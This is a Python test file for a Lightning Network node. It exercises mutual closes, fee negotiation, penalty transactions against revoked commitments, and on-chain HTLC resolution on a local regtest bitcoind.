def test_closing_torture(node_factory, executor, bitcoind):
# We set up N-to-N fully-connected mesh, then try
# closing them all at once.
amount = 10**6
num_nodes = 10 # => 55 channels (36 seconds on my laptop)
if VALGRIND:
num_nodes -= 4 # => 21 (135 seconds)
if SLOW_MACHINE:
num_nodes -= 1 # => 45/15 (37/95 seconds)
nodes = node_factory.get_nodes(num_nodes)
# Make sure bitcoind has plenty of utxos
bitcoind.generate_block(num_nodes)
# Give them all plenty of UTXOs, make sure they see them
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
addr = nodes[i].rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txs = []
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
nodes[i].rpc.connect(nodes[j].info['id'], 'localhost', nodes[j].port)
txs.append(nodes[i].rpc.fundchannel(nodes[j].info['id'], amount)['txid'])
# Make sure they're all in, then lock them in.
bitcoind.generate_block(1, wait_for_mempool=txs)
# Wait for them all to be CHANNELD_NORMAL
for n in nodes:
wait_for(lambda: all(p['channels'][0]['state'] == 'CHANNELD_NORMAL' for p in n.rpc.listpeers()['peers']))
# Start closers: can take a long time under valgrind!
futures = []
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
futures.append(executor.submit(nodes[i].rpc.close, nodes[j].info['id']))
futures.append(executor.submit(nodes[j].rpc.close, nodes[i].info['id']))
# Wait for close to finish
close_txs = set()
for f in futures:
# If one side completes closing, we'll get an error here 'Peer has no active channel'
try:
close_txs.add(f.result(TIMEOUT)['txid'])
except RpcError as err:
assert err.error['message'] == 'Peer has no active channel'
# Should have one close for each open.
assert len(close_txs) == len(txs)
# Get closes confirmed
bitcoind.generate_block(100, wait_for_mempool=list(close_txs))
# And make sure they hangup.
for n in nodes:
wait_for(lambda: n.rpc.listpeers()['peers'] == [])
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_closing_different_fees(node_factory, bitcoind, executor):
l1 = node_factory.get_node()
# Default feerate = 15000/7500/1000
# It will start at the second number, accepting anything above the first.
feerates = [[20000, 15000, 7400], [8000, 1001, 100]]
amounts = [0, 545999, 546000]
num_peers = len(feerates) * len(amounts)
addr = l1.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, 1)
numfunds = len(l1.rpc.listfunds()['outputs'])
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
# Create them in a batch, for speed!
peers = []
for feerate in feerates:
for amount in amounts:
p = node_factory.get_node(feerates=feerate)
p.feerate = feerate
p.amount = amount
l1.rpc.connect(p.info['id'], 'localhost', p.port)
peers.append(p)
for p in peers:
p.channel = l1.rpc.fundchannel(p.info['id'], 10**6, minconf=0)['channel_id']
# Technically, this is async to fundchannel returning.
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(6)
# Now wait for them all to hit normal state, do payments
l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
+ ['to CHANNELD_NORMAL'] * num_peers)
for p in peers:
if p.amount != 0:
l1.pay(p, 100000000)
# Now close all channels (not unilaterally!)
closes = [executor.submit(l1.rpc.close, p.channel, 0) for p in peers]
for c in closes:
c.result(90)
# close does *not* wait for the sendrawtransaction, so do that!
# Note that since they disagree on the ideal fee, they may conflict
# (first one in will win), so we cannot look at logs, we need to
# wait for mempool.
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
bitcoind.generate_block(1)
for p in peers:
p.daemon.wait_for_log(' to ONCHAIN')
wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
disconnects = ['-WIRE_CLOSING_SIGNED',
'@WIRE_CLOSING_SIGNED',
'+WIRE_CLOSING_SIGNED']
l1 = node_factory.get_node(disconnect=disconnects, may_reconnect=True)
l2 = node_factory.get_node(may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
chan = l1.fund_channel(l2, 10**6)
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
l1.rpc.close(chan)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool (happens async, so
# CLOSINGD_COMPLETE may come first).
l1.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
l2.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_inhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an incoming HTLC"""
# We suppress each one after first commit; HTLC gets added not fulfilled.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'], may_fail=True, feerates=(7500, 7500, 7500), allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l1.pay, l2, 100000000)
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# They should both have commitments blocked now.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 got l2's commitment to the HTLC, and sent to master.
l1.daemon.wait_for_log('got commitsig')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Should fulfill.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Payment should now complete.
t.result(timeout=10)
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
wait_for(lambda: len(l2.getactivechannels()) == 0)
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 2
# Allow some lossage for fees.
slack = 27000 if chainparams['elements'] else 15000
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - slack
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_outhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an outgoing HTLC"""
# First we need to get funds to l2, so suppress after second.
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'], may_fail=True, feerates=(7500, 7500, 7500), allow_broken_log=True)
l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'])
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Move some across to l2.
l1.pay(l2, 200000000)
assert not l1.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
assert not l2.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l2.pay, l1, 100000000)
# Make sure we get signature from them.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
l2.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
# Make sure both sides got revoke_and_ack for that commitment.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Thread should complete.
t.result(timeout=10)
# Make sure both sides got revoke_and_ack for final.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/OUR_HTLC')
l2.daemon.logsearch_start = needle
l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 3
# Allow some lossage for fees.
slack = 27000 if chainparams['elements'] else 15000
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - slack
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
"""Onchain handling where funder immediately drops to chain"""
# HTLC 1->2, 1 fails just after funding.
disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
l1 = node_factory.get_node(disconnect=disconnects)
# Make locktime different, as we once had them reversed!
l2 = node_factory.get_node(options={'watchtime-blocks': 10})
l1.fundwallet(10**7)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
"""Onchaind should not watch random spends"""
l1, l2 = node_factory.line_graph(2)
l1.pay(l2, 200000000)
l1.rpc.dev_fail(l2.info['id'])
l1.daemon.wait_for_log('Failing due to dev-fail command')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# First time it sees it, onchaind cares.
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
'OUR_DELAYED_RETURN_TO_WALLET')
# Now test unrelated onchain churn.
# Daemon gets told about wallet; says it doesn't care.
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
l1.daemon.wait_for_log("but we don't care")
# And lightningd should respect that!
assert not l1.daemon.is_in_log("Can't unwatch txid")
# So these should not generate further messages
for i in range(5):
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
# Make sure it digests the block
sync_blockheight(bitcoind, [l1])
# We won't see this again.
assert not l1.daemon.is_in_log("but we don't care",
start=l1.daemon.logsearch_start)
# Note: for this test we leave onchaind running, so we can detect
# any leaks!
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
options = {'watchtime-blocks': 201, 'cltv-delta': 101}
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options=options, disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(options=options)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')['payment_hash']
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 101,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
    # Wait for nodes to notice the failure; this search needle is after the
    # DB commit, so we're sure the tx entries in onchaindtxs have been added
l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
# We should at least have the init tx now
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
# Generate some blocks so we restart the onchaind from DB (we rescan
# last_height - 100)
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
# l1 should still have a running onchaind
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
l2.rpc.stop()
l1.restart()
# Can't wait for it, it's after the "Server started" wait in restart()
assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
# l1 should still notice that the funding was spent and that we should react to it
l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
sync_blockheight(bitcoind, [l1])
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
"""Onchain handling of outgoing dust htlcs (they should fail)"""
# HTLC 1->2, 1 fails after it's irrevocably committed
disconnects = ['@WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Must be dust!
rhash = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')['payment_hash']
routestep = {
'msatoshi': 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
payfuture.result(5)
# Retry payment, this should fail (and, as a side-effect, tickle a
# bug).
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay([routestep], rhash)
# 6 later, l1 should collect its to-self payment.
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Restart l1, it should not crash!
l1.restart()
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
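# Hedged helper sketch (not used by these tests): the manual route steps passed to
# sendpay above are plain dicts; this illustrative constructor simply names the
# fields already used in this file ('msatoshi', 'id', 'delay', 'channel').
def _example_routestep(peer_id, msatoshi, delay=5, channel='1x1x1'):
    """Build a single-hop route step in the shape sendpay expects in these tests."""
    return {'msatoshi': msatoshi, 'id': peer_id, 'delay': delay, 'channel': channel}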
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
"""Onchain handling of outgoing failed htlcs"""
# HTLC 1->2, 1 fails just after it's irrevocably committed
disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Make sure CLTVs are different, in case it confuses onchaind.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1])
# Second one will cause drop to chain.
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
bitcoind.generate_block(4)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
payfuture.result(5)
# 2 later, l1 spends HTLC (5 blocks total).
bitcoind.generate_block(2)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 89 later, l2 is done.
bitcoind.generate_block(89)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_middleman(node_factory, bitcoind):
# HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l1 = node_factory.get_node()
l2 = node_factory.get_node(disconnect=disconnects)
l3 = node_factory.get_node()
# l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fund_channel(l1, 10**6)
c23 = l2.fund_channel(l3, 10**6)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
rhash = l3.rpc.invoice(10**8, 'middleman', 'desc')['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash)
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, and spend to-us (any order)
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# Three more, l2 can spend to-us.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# One more block, HTLC tx is now spendable.
l1.bitcoin.generate_block(1)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l2 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
"""Onchain handling when we restart with different fees"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1 = node_factory.get_node(may_reconnect=True)
l2 = node_factory.get_node(disconnect=disconnects,
may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Make sure that gets included.
bitcoind.generate_block(1)
# Now we restart with different feerates.
l1.stop()
l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
l1.start()
# We recognize different proposal as ours.
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
# We use 3 blocks for "reasonable depth", so add two more
bitcoind.generate_block(2)
# Note that the very similar test_onchain_timeout looks for a
# different string: that's because it sees the JSONRPC response,
# and due to the l1 restart, there is none here.
l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')
# 90 later, l2 is done
bitcoind.generate_block(89)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 7 blocks and l1 should be done.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
"""Onchain handling when we reduce output to all dust"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**7 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
# Make l1's fees really high (and wait for it to exceed 50000)
l1.set_feerates((100000, 100000, 100000))
l1.daemon.wait_for_log('Feerate estimate for normal set to [56789][0-9]{4}')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
'THEIR_UNILATERAL/OUR_HTLC')
l1.daemon.wait_for_log('Ignoring output 0 of .*: THEIR_UNILATERAL/OUR_HTLC')
# 100 deep and l2 forgets.
bitcoind.generate_block(93)
sync_blockheight(bitcoind, [l1, l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# l1 does not wait for ignored payment.
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
"""Onchain handling when we've had a range of fees"""
l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
opts={'may_reconnect': True})
l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
p1 = executor.submit(l1.pay, l2, 1000000000)
l1.daemon.wait_for_log('htlc 0: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
l1.set_feerates((16000, 7500, 3750))
p2 = executor.submit(l1.pay, l2, 900000000)
l1.daemon.wait_for_log('htlc 1: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Restart with different feerate for second HTLC.
l1.set_feerates((5000, 5000, 3750))
l1.restart()
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
p3 = executor.submit(l1.pay, l2, 800000000)
l1.daemon.wait_for_log('htlc 2: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Drop to chain
l1.rpc.dev_fail(l2.info['id'])
l1.wait_for_channel_onchain(l2.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Both sides should have correct feerate
assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
bitcoind.generate_block(5)
